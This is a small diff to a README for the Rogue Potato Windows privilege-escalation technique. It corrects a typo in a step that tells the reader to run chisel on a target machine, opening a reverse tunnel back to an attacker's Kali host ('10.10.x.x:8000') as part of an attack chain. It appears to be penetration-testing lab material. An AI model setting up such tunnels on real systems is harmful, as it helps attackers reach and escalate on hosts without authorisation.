k4sth4/Rogue-Potato/README.md

 We can also use socat to port forward 135.
 First set chisel on Kali vm as mentioned above.
-Then on Target machine set run chisel as:
+Then on Target machine run chisel as:
 ```markdown
 .\chisel.exe client 10.10.x.x:8000 R:9999:localhost:9999
 ```